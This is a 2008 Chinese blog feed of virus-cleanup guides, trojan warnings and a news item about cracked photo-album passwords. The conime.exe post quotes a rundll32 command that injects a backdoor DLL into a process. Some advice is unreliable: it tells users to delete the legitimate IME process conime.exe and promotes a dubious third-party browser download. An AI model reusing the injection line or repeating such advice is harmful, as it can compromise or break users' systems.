毕竟,这是一家用数学难题测试应徵者,并将初次公开发行股票的筹资金额订在2,718,281,828美元(代表自然对数底数"e,")的公司。Google可以修改运算公式,就像微软最近处理Excel的数学问题,和英特尔在1990年代(付出昂贵代价)解决影响Pentium处理器的FDIV问题一样。

Google的计算机还有其他错误。如2.00135558564^1023被解释为1.79769313 x 10^308。但把这个数字稍微加一点到2.00135558565^1023,Google会把它视为一个搜寻请求,而非数学问题。

在最后一个例子,Google选择不算出答案,而是显示搜索结果,这种不会误导任何人的方法,就是所谓优雅的失败模式。没有答案总胜过错误的答案。尤其是真正使用计算机功能的人,是那些根本不会发现有错的人。

]]>
黑客&病毒http://www.zyseo.org/post/googlechuchou.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=326http://www.zyseo.org/cmd.asp?act=tb&id=326&key=98d4ee44
wklsdd.dll, zptldsys.dll, dbi100.dll 等木马群清理解决方案null@null.com (zyseo)http://www.zyseo.org/post/mumaqunqlfa.htmlTue, 26 Aug 2008 10:23:47 +0800http://www.zyseo.org/post/mumaqunqlfa.html到上检测下c:\windows\explorer.exe,若有问题,请在进程管理器内用相同系统版本的正常explorer.exe替换它
1.建议使用XDelBox删除以下文件:()
使用说明:删除时复制所有要删除文件的路径,在待删除文件列表里点击右键选择“剪贴板导入不检查路径”,导入后在要删除文件上点击右键,选择立刻重启删除,电脑会重启进入DOS界面进行删除操作。运行xdelbox前最好卸载所有可移动存储介质(包括U盘,MP3,手机存储卡等)。


c:\windows\system32\wklsdd.dll
c:\windows\system32\pedadt.dll
c:\windows\system32\apzhdtde.dll
c:\windows\system32\bootvidgj.dll
c:\windows\system32\mnmhhsrv.dll
c:\windows\system32\hdf453d1.dll
c:\windows\system32\tdfhex.dll
c:\windows\system32\mtewdh.dll
c:\windows\system32\mndsisrv.dll
c:\windows\system32\tdffdl.dll
c:\windows\system32\apsghjba.dll
c:\windows\system32\wrqszl.dll
c:\windows\system32\jfrwdh.dll
c:\windows\system32\ypdjhbmp.dll
c:\windows\system32\kbdswjr.dll
c:\windows\system32\ddserh.dll
c:\windows\system32\zptldsys.dll
c:\windows\system32\jfdses.dll
c:\windows\system32\ypcqhhlp.dll
c:\windows\system32\dndsaf.dll
c:\windows\system32\wzcfsw.dll
c:\windows\system32\dbi100.dll

2.删除重启后使用SREng修复下面各项:

    启动项目 -- 注册表之如下项删除:
[{47AC9076-C898-B098-D098-A18319080974}]    <>
[{55694105-5108-9405-3695-954187462155}]    <>
[{8C41B7F7-3168-400D-A702-0E7EFE0BA304}]    <>
[{6E6CA8A1-81BC-4707-A54C-F4903DD70BAD}]    <>
[{64FAE856-AD58-20CB-A025-CD4895FA6E46}]    <>
[{2A698452-C5D8-C584-C256-C264C987C5A2}]    <>
[{8A041F13-A111-12A3-B0CF-F99818AA68A8}]    <>
[{84143967-B645-4BFF-B873-DA1DC886E9A7}]    <>
[{AA59145F-315D-BC23-AC1F-145DF81A34AA}]    <>
[{45AADFAA-DD36-42AB-83AD-0521BBF58C24}]    <>
[{28EB3777-3E23-4E72-8449-A992D09D24C3}]    <>
[{17DFD111-BF3A-4CB4-ADB0-88FCBFE69821}]    <>
[{DC3D30AE-0380-4151-8934-EE98A34B0370}]    <>
[{E8A3B193-77E3-4FB3-986D-F4FA4828BAFC}]    <C:\WINDOWS\system32\wklsdd.dll>
[{5E907A48-400E-4EA8-9792-FFAE052D59E9}]    <C:\WINDOWS\system32\pedadt.dll>
[{4D698451-2015-6358-9871-2015987452D4}]    <C:\WINDOWS\system32\apzhdtde.dll>
[{00030003-0003-0003-0003-00030003BB15}]    <C:\WINDOWS\system32\bootvidgj.dll>
[{8C8D1401-A58D-A81C-CD24-A5915C4517C8}]    <C:\WINDOWS\system32\mnmhhsrv.dll>
[{C629FF4F-ACDB-5C90-A098-FACB3456A26C}]    <C:\WINDOWS\system32\hdf453d1.dll>
[{0B846B26-BFE6-4E8E-A948-1DB17B77B483}]    <C:\WINDOWS\system32\tdfhex.dll>
[{189F087F-4378-405F-85FA-37D955AD7A8C}]    <C:\WINDOWS\system32\mtewdh.dll>
[{97FD640A-158F-48AC-FD14-1597F14A9779}]    <C:\WINDOWS\system32\mndsisrv.dll>
[{C0595A7E-2E2F-4B34-A83A-019270A0A464}]    <C:\WINDOWS\system32\tdffdl.dll>
[{8FD45A54-9875-698F-E56E-65102358FDF8}]    <C:\WINDOWS\system32\apsghjba.dll>
[{F99DEFDD-200B-4410-B572-E90883D527D2}]    <C:\WINDOWS\system32\wrqszl.dll>
[{841529CB-7F77-4B99-A895-B5441E0D302F}]    <C:\WINDOWS\system32\jfrwdh.dll>
[{A1954FAC-1023-154F-895A-1458258AD81A}]    <C:\WINDOWS\system32\ypdjhbmp.dll>
[{00120012-0012-0012-0012-00120012BB15}]    <C:\WINDOWS\system32\kbdswjr.dll>
[{A9895933-6636-4281-BC58-EE6DE2AF96E3}]    <C:\WINDOWS\system32\ddserh.dll>
[{60940F85-F015-14F1-A05F-F69858AC6D06}]    <C:\WINDOWS\system32\zptldsys.dll>
[{81AF1CF6-D1C9-4C6A-AC01-EDE54E71945B}]    <C:\WINDOWS\system32\jfdses.dll>
[{90AF1289-F140-A140-D012-C1458759FC09}]    <C:\WINDOWS\system32\ypcqhhlp.dll>
[{259BF3CF-194D-4FE6-9ADB-DE6544B098B6}]    <C:\WINDOWS\system32\dndsaf.dll>
[{28766E1C-74B0-4417-8C75-F12AE309EF35}]    <C:\WINDOWS\system32\wzcfsw.dll>
[bootvidgj.dll]    <C:\WINDOWS\system32\bootvidgj.dll>
[kbdswjr.dll]    <C:\WINDOWS\system32\kbdswjr.dll>

    启动项目 -- 服务 -- Win32服务应用程序之如下项禁用:
[Security Control / seictrl]    <c:\windows\system32\rundll32.exe dbi100.dll,scan>


(注:第一次重启有时候会弹出文件夹,那是由于自启动项目还没有删除,而文件已经被XDELBOX删除并用文件夹替代的结果)

]]>
黑客&amp;病毒http://www.zyseo.org/post/mumaqunqlfa.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=323http://www.zyseo.org/cmd.asp?act=tb&id=323&key=ec05f898
网上看奥运小心病毒入侵null@null.com (zyseo)http://www.zyseo.org/post/wangshangkay.htmlMon, 11 Aug 2008 15:23:48 +0800http://www.zyseo.org/post/wangshangkay.html奥运越来越近,那些没有买到票的朋友如何第一时间感受奥运赛场的酣汗淋漓呢?网络无疑成为广大网友获取奥运资讯、观看奥运视频的首选。然而,这样一来就给各种网络病毒提供了作案的时机。(最好回家看电视呵呵~~`)
近年来,热点事件已经成为了病毒传播的“帮凶”。病毒利用热点事件受关注率高、网友浏览点击率高的特点,伪装成热点电影、热点网络视频、热点照片等诱骗用户点击下载,进而感染病毒。
奥运会势必是万众瞩目的焦点,金山毒霸反病毒专家特别提示广大网民,奥运期间,一定要安装正版杀毒软件(登陆 免费下载并使用金山毒霸),及时升级,并开启实时监控、防火墙等功能,以免遭遇“奥运”病毒。
金山毒霸全球反病毒监测中心提醒广大提醒用户,奥运期间需高度警惕一下10大病毒:
“疯子下载器106496”(Win32.Troj.DownLoader.wd.106496)
这是一个木马下载器。它具有对抗安全软件的功能,会破坏一些安全软件的运行,然后下载大量网游、网银盗号木马等恶意程序,严重威胁用户虚拟财产安全。与一般下载器病毒不同的是,“疯子”还有秘密武器,设置计时器“防身”,每隔一段时间就重复运行一次,以防止用户删除。

2、“鸽子窝下载器 363520”(Win32.Hack.Huigezi.363520)
这是一个蠕虫型下载器,除了具备“灰鸽子”的远程窃密、控制系统外,还可破坏用户电脑内的杀毒软件,下载大量网游、网银盗号木马等恶意程序,严重威胁用户商业机密、个人隐私及虚拟财产安全。作为“灰鸽子”的最新变种,具备当下最流行的病毒下载器特征,可下载大量其他盗号木马、病毒,感染性、破坏性更强。

“网络红娘变种364544”(Win32.Hack.RedGirl.m. 364544)
这是一个远程控制木马“网络红娘”最新变种,在对抗安全软件方面的能力越来越强。为了逃避杀毒软件的查杀,病毒插入了大量垃圾指令,同时,将图标伪装为常见的安装文件图标。在对付杀软的同时,修改注册表实现自动启动,利用IE浏览器创建远程线程,连接黑客指定的远程服务器,接收监控端命令,达到控制中毒电脑的目的。
“网银黑客盗号器61440”(Win32.Hack.Agent.61440)
这是一个新型的网银盗号病毒,与以往的网银盗号木马不同,该病毒在对抗安全软件方面着实下了功夫,运行后会替换掉系统桌面文件explore.exe和beep.sys文件,替换后,用户获知系统异常的机会将被降低,从而让病毒能够躲避查杀。继而连接病毒作者指定的地址,将记录到的数据发送出去,导致用户网银帐号丢失。 
“破坏型广告刷子61440”(Win32.HackTool.DownLoader.d.61440) 
这是一个广告木马程序。它自带有一个网址库,会引导用户的IE浏览器自动登录这些网址,帮它们刷流量。用户只能够浏览病毒自带广告站点,十分让人气愤。在病毒弹出的网页中,有一些是恶意网站,充满了各种恶意文件,一旦浏览,就可能被感染。而且病毒在运行过程中会破坏系统的大量数据,造成电脑运行异常,危害性较强。
6、、“死猪下载器147456”(Win32.Troj.EncodeXor.a.147456)
这是一个下载器程序。攻击性较强,它采取双进程同时运行的方法来实现自我保护,疯狂映像劫持几乎所有目前的主流安全软件,造成电脑完全丧失防御能力。病毒目的如名称一样,就是把用户的安全软件弄死。然后下载病毒列表,其中大部分是网游、网银盗号木马,对用户的虚拟财产、银行存款、商业机密等构成无法估计的威胁。
“木马组合模块219648”(Win32.Troj.WdHitT.a.219648)
这个病毒是 win32.Troj.WeHit.397312木马的组成部分。eHit家族木马分工明确,除了传统下载器功能以外,还有广告软件功能,会在后台访问指定网站刷流量信息。此外,病毒会连接指定的远程地址,上传用户的电脑信息,并下载其它木马到用户电脑中运行,从而带来更多的麻烦。
“还原卡破坏者73728”(Win32.TrojDownloader.Agent.73728)
这是一个木马下载者程序。这个下载器在对抗系统安全模块方面做了许多工作,它能绕开安全模块的监视,非法连接远程服务器,甚至还可以穿透还原卡。病毒会修改系统文件、打开本地端口协议端口连接网络,然后下载病毒,并穿透电脑上安装的还原卡,运行病毒,对网吧等等场所的电脑破坏极大。
“野狗下载器40960”(Win32.Hack.PcClient.40960) 
这是一个类似于机器狗的木马下载器。机器狗病新变种已经很久没有在我们的视线中出现。但很多与它类似的木马下载器依旧不断冒头。病毒尝试用修改系统时间、解除主动防御、结束进程等方式,破坏多款安全软件的正常运行,然后下载数量惊人的网游、网银盗号木马,严重危害用户虚拟财产。
“江湖医生45056”(Win32.TrojDownloader.Zlob.45056)
这是一个诈骗型的木马程序。病毒运行后会在IE浏览器中擅自添加搜索插件,还会挟持IE的页面指向病毒作者指定的广告网站,强迫用户浏览。还在用户电脑中安装插件,并把用户引导到一个假的在线杀毒网站,强迫用户购买,如果用户拒绝,就会不断的弹出询问窗口。属于典型的流氓行为。
金山毒霸反病毒专家建议用户,采取以下2点措施保护网络安全,畅享体育盛世:
1、安装专业的杀毒软件(登录 免费下载最新版金山毒霸2008)进行全面监控,防范奥运期间日益增多的病毒。
2、正值暑期,玩网络游戏、利用QQ等即时聊天工具交流的用户数量增多,所以各类盗号木马必将随之增加(登录 http://www.duba.net/qing/下载永久免费的金山清理专家,给电脑查漏补缺),建议用户养成良好的网络使用习惯。

 

]]>
黑客&amp;病毒http://www.zyseo.org/post/wangshangkay.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=309http://www.zyseo.org/cmd.asp?act=tb&id=309&key=9ece1db5
Infostealer.Gampass病毒彻底清除null@null.com (zyseo)http://www.zyseo.org/post/Infostealer.Gampass.htmlMon, 16 Jun 2008 12:41:44 +0800http://www.zyseo.org/post/Infostealer.Gampass.html为什么要制造病毒来浪费我的宝贵时间啊!真是郁闷。
不过没办法,还是要和病毒做做斗争,战斗的武器不能失去啊。

首先仔细看一下Norton的提示:
Infostealer.Gampass病毒,感染文件是 Windows\System\system32.dll 文件。

首先尝试自行在安全模式下删除该文件,结果重新启动后,该文件又冒出来,再次感染病毒。看来需要求助一下Google了。

基本上得出以下结论:
1.Infostealer.Gampass可能并非特定的病毒,而是Norton对一类病毒的定义
2.基本上这是木马类病毒
3.不同的变种感染的文件可能完全不同

所以处理起来,真是要因情况而异。

清理这个病毒用了两个辅助工具:

1.SREng
参考下载地址:
本地下载地址:
System Repair Engineer,简称 SREng,是一款计算机安全辅助和系统维护辅助软件。主要用于发现、发掘潜在的系统故障和大多数由于计算机病毒造成的破坏,并提供一系列的修改建议和自动修复方法。

使用这个软件扫描旨在确定哪些进程调用了病毒程序。

2.费尔木马强力清除助手
参考下载地址:
本地下载:
使用这个工具可以强制清除感染文件并且防止再生,我使用这个软件清除了system32.DLL文件,然后在原位置生成了一个只读、隐藏的system32.DLL文件夹,这样病毒文件就无法生成出来了。

我尝试过手工创建只读的system32.DLL文件,但是发现没有用,最后还是被病毒替代了。
使用PowerRMV工作生效。

用Powerrmv清除文件,重启系统后,恢复正常,病毒文件没有再次生成。

不过具体是否还有其他隐患目前还无法确定,使用Norton进行全计算机扫描并未发现任何病毒。
姑且认为暂时安全吧!今晚的时间全TMD浪费了!

还可以尝试另一种方法

首先检查各分区根目录,没有发现 autorun.inf 的目录或可疑的可执行文件。 c:\windows 和 c:\windows\system32 两个系统目录,也是重点,发现下面有很多 " 数字 .exe" 或 " 数字 + 字母 .exe" 的文件以及同名的 .dll 文件,估计是病毒自动生成的,但这些绝对不是主体病毒文件,所以估计删除了也没太大作用,还是先删了再说。


病毒应该隐藏得更深一些。


接着开始检查注册表。


检查 HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN


HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN


HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN


HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN


四个键值下面的可疑程序,在后面两个键下面,果然发现如下的项有问题:


C:\windows\system32\winbill*.dll, c:\program files\internet explorer\use19.dll


其中的 * 代表数字。


删除和上面两个文件有关的键,此时不能删除这两个文件。重启电脑进入安全模式,删除以上两个文件(在 c:\program files\internet explorer\ 下还发现一个 use32.dll 的文件,同样删掉。),这就是病毒的主体文件。再次全盘扫描,清除系统目录下的病毒尸体。重新启动,诺顿再也没有弹出警报。


分析了一下,这个病毒实际是个间谍软件,对系统没有太大影响和破坏力。诺顿可以查出这个病毒,也可以抑制,但由于病毒在系统启动时就加载了,所以诺顿无法彻底清除,故只能采用手动与自动相结合的办法来杀毒了。

]]>
黑客&amp;病毒http://www.zyseo.org/post/Infostealer.Gampass.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=258http://www.zyseo.org/cmd.asp?act=tb&id=258&key=f5fb5945
彻底结束LSASS.exe进程病毒null@null.com (zyseo)http://www.zyseo.org/post/LSASS.exe.htmlThu, 29 May 2008 16:46:42 +0800http://www.zyseo.org/post/LSASS.exe.htmllsass.exe是一个系统进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略。注意:lsass.exe也有可能是Windang.worm、irc.ratsou.b、Webus.B、MyDoom.L、Randex.AR、Nimos.worm创建的,病毒通过软盘、群发邮件和P2P文件共享进行传播。

进程文件: lsass or lsass.exe
进程名称: Local Security Authority Service
进程类别:其他进程
英文描述:

lsass.exe is a system process of the Microsoft Windows security mechanisms. It specifically deals with local security and login policies. Note: lsass.exe also relates to the Windang.worm, irc.ratsou.b, Webus.B, MyDoom.L, Randex.AR, Nimos.worm which
中文参考:
对不起,暂时没有中文参考!
出品者:Microsoft Corp.
属于:Microsoft Windows Operating System
系统进程:Yes
后台程序:Yes
网络相关:Yes
常见错误:N/A
内存使用:N/A
安全等级 (0-5): 0
间谍软件:No
广告软件:No
病毒:No

如果你的启动菜单里有个lsass.exe启动项,那就证明你得lsass.exe木马病毒,中毒后,会在windows里产生lsass.exe和exert.exe两个病毒文件,还会在D盘根目录下产生command.com和autorun.inf两个文件,同时侵入注册表破坏系统文件关联。在进程里可以见到有两个相同的进程,分别是lsass.exet和LSASS.EXE.同时在windows下生成LSASS.EXE和exert.exe两个可执行文件,且在后台运行。LSASS.EXE管理exe类执行文件,exert.exe管理程序退出。

下载个进程管理器,找出问题进程的路径,手动终止LSASS.EXE和exert.exe两个进程(管理器不能终止LSASS.EXE,提示系统进程不能终止),打开msconfig.exe取消LSASS.EXE启动项。删除C:\Documents and Settings\Administrator\Local Settings\tempt和Temporary Internet Files下的文件,断开网络后再删除C:\Program Files\Common Files\update文件夹,这里exe类文件已不能运行,新建一个reg文件,输入如下内容:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe]
@="exefile"
"Content Type"="%1,%*"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\PersistentHandler]
@="{098f2470-bae0-11cd-b579-08002b30bfeb}"
或用工具恢复注册表。

以WIN98为例:
打开IE属性删除cookies和所有脱机内容,启动进程杀手终止lsass.exe和exert.exe两个进程,然后到windows目录下删除这两个文件,这两个文件是隐藏的,再到D:删除command.com和autorun.inf两个文件,最后重启电脑到DOS 运行,用scanreg/restore 命令来恢复注册表,(如果不会的或者是XP系统不能用的可以用瑞星注册表修复程序之类的软件修复一下注册表),重启后进到WINDOWS桌面用杀毒软件(本人用金山毒霸2006)全面杀毒,清除余下的病毒!

windows xp下解决LSASS.exe进程病毒

一、准备工作:
打开“我的电脑”——工具——文件夹选项——查看
a、把“隐藏受保护的操作系统文件(推荐)”和“隐藏已知文件类型的扩展名”前面的勾去掉;
b、勾中“显示所有文件和文件夹”

二、结束进程
用Ctrl+Alt+Del调出windows务管理器,想通过右击当前用户名的lsass.exe来结束进程是行不通的.会弹出该进程为系统进程无法结束的提醒框;
点到任务管理器进程面版,点击菜单,"查看"-"选择列",在弹出的对话框中选择"PID(进程标识符)",并点击"确定"。找到映象名称为"LSASS.exe",并且用户名不是"SYSTEM"的一项,记住其PID号.点击"开始"——运行,输入"CMD",点击"确定"打开命令行控制台。
输入"ntsd –c q -p (此红色部分填写你在任务管理器里看到的LSASS.EXE的PID列的数字,是当前用户名进程的PID,别看错了)",比如我的计算机上就输入"ntsd –c q -p 1064".这样进程就结束了。(如果结束了又会出现,那么你还是用下面的方法吧)
(另外我强烈推荐大家用Process Explorer,很强的进程管理工具,可以直接结束想要结束的进程,以后用的时候很方便,使用和下载地址:)
三、删除病毒文件
删除如下几个文件: (与WIN2000的目录有所不同)
C:\Program Files\Common Files\INTEXPLORE.pif (有的没有.pif)
C:\Program Files\Internet Explorer\INTEXPLORE.com
C:\WINDOWS\EXERT.exe
C:\WINDOWS\IO.SYS.BAK
C:\WINDOWS\LSASS.exe
C:\WINDOWS\Debug\DebugProgram.exe
C:\WINDOWS\system32\dxdiag.com
C:\WINDOWS\system32\MSCONFIG.COM
C:\WINDOWS\system32\regedit.com
在D:盘上点击鼠标右键,选择“打开”。删除掉该分区根目录下的"Autorun.inf"和"command.com"文件.

四、删除注册表中的其他垃圾信息
将C:\WINDOWS目录下的"regedit.exe"改名为"regedit.com"并运行,删除以下项目:
1、HKEY_CLASSES_ROOT\WindowFiles
2、HKEY_CURRENT_USER\Software\VB and VBA Program Settings
3、HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 下面的 Check_Associations项
4、HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\INTEXPLORE.pif
5、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下面的ToP项

五、修复注册表中被篡改的键值
1、将HKEY_CLASSES_ROOT\.exe的默认值修改为 "exefile"(原来是windowsfile)
2、将HKEY_CLASSES_ROOT\Applications\iexplore.exe\shell\open\command 的默认值修改为 "C:\Program Files\Internet Explorer\iexplore.exe" %1 (原来是intexplore.com)
3、将HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command 的默认值修改为
"C:\Program Files\Internet Explorer\IEXPLORE.EXE"(原来是INTEXPLORE.com)
4、将HKEY_CLASSES_ROOT \ftp\shell\open\command 和HKEY_CLASSES_ROOT\htmlfile\shell\opennew\command
的默认值修改为"C:\Program Files\Internet Explorer\iexplore.exe" %1 (原来的值分别是INTEXPLORE.com和INTEXPLORE.pif)
5、将HKEY_CLASSES_ROOT \htmlfile\shell\open\command 和
HKEY_CLASSES_ROOT\HTTP\shell\open\command的默认值修改为
"C:\Program Files\Internet Explorer\iexplore.exe" –nohome
6、将HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet 的默认值修改为"IEXPLORE.EXE".(原来是INTEXPLORE.pif)

六、收尾工作
关掉注册表编辑器
将C:\WINDOWS目录下的regedit.com改回regedit.exe

]]>
黑客&amp;病毒http://www.zyseo.org/post/LSASS.exe.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=245http://www.zyseo.org/cmd.asp?act=tb&id=245&key=4efeec9c
wextract_cleanup0清除方法null@null.com (zyseo)http://www.zyseo.org/post/wextract_cleanup0.htmlFri, 16 May 2008 14:26:35 +0800http://www.zyseo.org/post/wextract_cleanup0.htmlwextract_cleanup0清除步骤
1、建议首先下载使用更加安全的,由 Google推介的最安全的网页浏览器 ,下载地址是: http://www.360ws.org/GGbrowser/GGbrowser.htm ,避免感染变种病毒;
2.关闭系统还原功能,重启电脑进入安全模式;
3.下载killbox(本站首页有免费版下载)及SRENG(注册表清理),删除病毒文件及注册表键值: C:\WINDOWS\system32\advpack.dll

4.运行杀毒软件,进行全盘杀毒;
5.清除IE临时文件,或下载ATF临时文件清除工具清理,下载地址 http://www.atribune.org/public-beta/ATF-Cleaner.exe;
6、您应该已经成功清除wextract_cleanup0病毒了。
网友推荐的其他关于wextract_cleanup0查杀方法及wextract_cleanup0病毒档案:
其他专杀办法:
注意:在安装微软的某个补丁的时候也会提示这个问题,那么这就可能不是灰鸽子病毒,是正常的补丁安装程序,所以如果是在安装补丁,那么在杀软提示的时候建议放行,应该不会有问题的。 ]]>
黑客&amp;病毒http://www.zyseo.org/post/wextract_cleanup0.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=220http://www.zyseo.org/cmd.asp?act=tb&id=220&key=f6fe0fc5
conime.exe病毒专杀方案null@null.com (zyseo)http://www.zyseo.org/post/conimeexe.htmlMon, 12 May 2008 09:05:54 +0800http://www.zyseo.org/post/conimeexe.html第一步首先结速conime.exe进程,然后在system32中找到conime.exe将其删除。

第二步修改注册表找到:"HKEY_CURRENT_USER\Console"中的"LoadConIme"修改为"0"即可

--------------------------------------

conime.exe进程说明:conime.exe是输入法编辑器,允许用户使用标准键盘就能输入复杂的字符与符号! conime.exe同时可能是一个bfghost1.0远程控制后门程序。此程序允许攻击者访问你的计算机,窃取密码和个人数据。建议立即删除此进程。”

以前总是不知什么时候这个进程就悄悄启动了,后来才发现往往在运行cmd.exe之后会出现。但是conime.exe并不是cmd.exe的子进程,它的的父进程ID并没有在任务管理器中显示。

conime经常会被病毒利用感染,建议删除。

如何删除conime.exe‖conime.exe专杀‖删除conime.exe的方法||conime.exe删不掉

conime.exe是输入法编辑器相关程序。注意:conime.exe同时可能是一个bfghost1.0远程控制后门程序。此程序允许攻击者访问你的计算机,窃取密码和个人数据。建议立即删除此进程。
-------------------------------------------------
第1步:
用Msconfig来屏蔽(点开始?运行?输入msconfig?回车,最后一项目conime.exe前的对号),但注册表还是残留它的,建议用注册表编辑器

进入注册表编辑器(点开始?运行?输入regedit?回车)
逐项进入分支:
HKEY_LOCAL_MACHINE
-Software
--Microsoft
---Windows
----CurrentVersion
-----Run
看Run里面(右侧窗口里)有没有这个conime.exe,有就删除

另外在HKEY_CURRENT_USER的相同分支下,也有Run,必须也要看看!

第2步:
重启,搜索看有没有conime.exe这个文件,删了它
有必要的话,可以在DOS(或安全模式)下删除
进程知识库

conime - conime.exe - 进程信息
进程文件: conime 或者 conime.exe


进程名称: BFGhost 1.0

描述:
conime.exe是BFGhost 1.0远程控制后门程序的一部分。这个后门程序能够运行攻击者访问你的计算机,窃取密码和个人数据。这个进程的安全等级是建议立即进行删除。

发现conime.exe进程在网上颇有争议

网上帖:
conime.exe是输入法编辑器,允许用户使用标准键盘就能输入复杂的字符与符号
conime.exe>>ConsoleIMEIME控制台,不是什么病毒程序,不用管她

看看下面:
C:\>rundll32hkdoordll,DllRegisterServerconime.exe1
此方式只感染进程,而不感染系统文件,机器重启或进程退出后门也就退出,conime.exe是你要感染的进程

再看出名的‘广外男生':
c:\winnt\system32\gwboydll.dll
大约占用内存233K左右,这个进程无法终止,我测试时终止了explorer.exe的进程,gwboydll.dll马上插入另一正常系统进程conime.exe中;因此木马激活后是无法终止的...

此进程的特殊性,conime.exe是病毒光顾的常客,是否有毒,关键看它是否不可中止或无规律自动激活,如果是,杀毒吧

]]>
黑客&amp;病毒http://www.zyseo.org/post/conimeexe.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=215http://www.zyseo.org/cmd.asp?act=tb&id=215&key=1eed8248
黑客制造平民版艳照门null@null.com (zyseo)http://www.zyseo.org/post/pmbyzm.htmlThu, 08 May 2008 10:58:53 +0800http://www.zyseo.org/post/pmbyzm.html破解网络相册密码情侣不雅照外流网站建议使用较复杂的密码

近日,一个被破解密码的网易相册在网上广泛流传,相册内有一名女子的大量自拍不雅照。有网友称,此事为一个平民版的“艳照门”。记者了解到,因部分相册的密码较简单,几十个网络相册密码被黑客破解,大量“吸引眼球”的照片在网上流传。昨天,网易已关闭了这些问题相册。

女子自拍照网上传播

前天,王先生在一个论坛里发现一个帖子,帖子公布了黑客破解的一个网易相册的链接和登录密码。王先生进入该相册后,发现加密的相册中有大量自拍的不雅照,另外还有部分生活照。

昨天,记者进入该相册,发现相册中共有18组照片,其中15组为公开权限,网民可以随意浏览,照片内容全部为明星生活照。另外3组则设置了访问密码,只有输入密码,才能看到里面的照片。

据曾进入加密相册的网友介绍,加密的相册中有一些女子的裸照和一些生活不雅照。该相册的主人资料显示,相册主人为一名28岁的女子范某某。

通过搜索,记者发现,早在3月初,公布了该相册地址和密码的帖子就在天涯、猫扑、大旗等多个论坛出现。现在,这些帖子均已被删除,只能通过网络快照看到。此外,部分个人博客和论坛中仍可见到该帖存在。帖子中称,这是黑客破解的女子范某某和家人拍摄的生活照。有网友称,这是平民版的“艳照门”。

照片中生活照的背景显示,照片的拍摄地均集中在深圳某社区附近。记者联系到该社区工作站(因涉及到当事人隐私,社区名字在此隐去)。一名工作人员说,他们不清楚该社区是否有范某某,如果能联系到该女子,会转告她相关情况。

大量加密相册被破解

记者查询到,除范某某的网络相册被黑客破解外,另有几十个网易相册的地址和密码也被公布。这些帖子仍大量存在于个人博客、网络论坛、百度贴吧等处。因范某某相册中的照片高度疑似自拍照,故该相册成为网民们传播的重点。

据了解,被破解密码的相册中,多数含有大量色情照片,有的则为情侣们自拍的亲密照。因通过相册能直接进入当事人的博客,当事人的更多信息被暴露出来。

记者注意到,这些被破解密码的相册有一个共同特点:密码设置比较简单。如有的相册密码跟用户名相同,有的密码则为简单的数字组合,如:123456等。

昨天,记者在网上搜索到一名网友在博客中发的帖子,该帖中图文并茂地传授破解简单的网易相册密码的方法,并提供了破解软件的下载地址。该网友在博客中称,所破解的网易相册密码设计均比较简单,使用软件即可破解。

网易已关闭问题相册

网易客服和相册部反映了网易相册中存在不雅照及部分相册密码被破解一事。

网易客服人员称,他们每天都按时段对相册内容进行监控,一旦发现不健康内容,将立即删除。对于相册密码被破解,一名负责人表示,部分用户的密码太简单,容易被黑客破解。网易提醒用户,尽量使用组合比较复杂的密码,并经常更换密码。此外,建议用户注意网络安全,尽量不要把一些隐私和重要的照片传到网上。

杰通律师事务所孟庆源律师认为,黑客盗取他人密码,网民在网上传播相关链接、进入相册观看,都侵犯了当事人的隐私权。如果在网上恶意传播链接、以此牟利或对当事人构成严重影响,应承担刑事责任。他表示,面对日益增加的网络侵犯隐私权,当事人维权的难度却很大。互联网的健康发展,一方面需要健全互联网的相关法规,另一方面也需要网民自律和增强防范意识。

]]>
黑客&amp;病毒http://www.zyseo.org/post/pmbyzm.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=208http://www.zyseo.org/cmd.asp?act=tb&id=208&key=555b9136
services.exe进程病毒解决方案null@null.com (zyseo)http://www.zyseo.org/post/services.exe.htmlThu, 08 May 2008 10:48:16 +0800http://www.zyseo.org/post/services.exe.html1 services.exe - services - 进程介绍

进程文件: services or services.exe

进程名称: Windows Service Controller

进程类别:其他进程

英文描述:

services.exe is a part of the Microsoft Windows Operating System and manages the operation of starting and stopping services. This process also deals with the automatic starting of services during the computers boot-up and the stopping of servicse durin

中文参考:

services.exe是微软Windows操作系统的一部分。用于管理启动和停止服务。该进程也会处理在计算机启动和关机时运行的服务。这个程序对你系统的正常运行是非常重要的。注意:services也可能是W32.Randex.R(储存在%systemroot%\system32\目录)和Sober.P (储存在%systemroot%\Connection Wizard\Status\目录)木马。该木马允许攻击者访问你的计算机,窃取密码和个人数据。该进程的安全等级是建议立即删除。

出品者:Microsoft Corp.

属于:Microsoft Windows Operating System

系统进程:Yes

后台程序:Yes

网络相关:No

常见错误:N/A

内存使用:N/A

安全等级 (0-5): 0

间谍软件:No

广告软件:No

病毒:No

木马:No

这个后门还不错,也有点BT吧,共产生14个文件+3个快捷图标+2个文件夹。注册表部分,除了1个Run和System.ini,比较有特点是,非普通地利用了EXE文件关联,先修改了.exe的默认值,改.exe从默认的 exefile更改为winfiles,然后再创建winfiles键值,使EXE文件关联与木马挂钩。即为中毒后,任意一个EXE文件的属性,“应用程序”变成“EXE文件”

当然,清除的方法也很简单,不过需要注意步骤:

一、注册表:先使用注册表修复工具,或者直接使用regedit修正以下部分

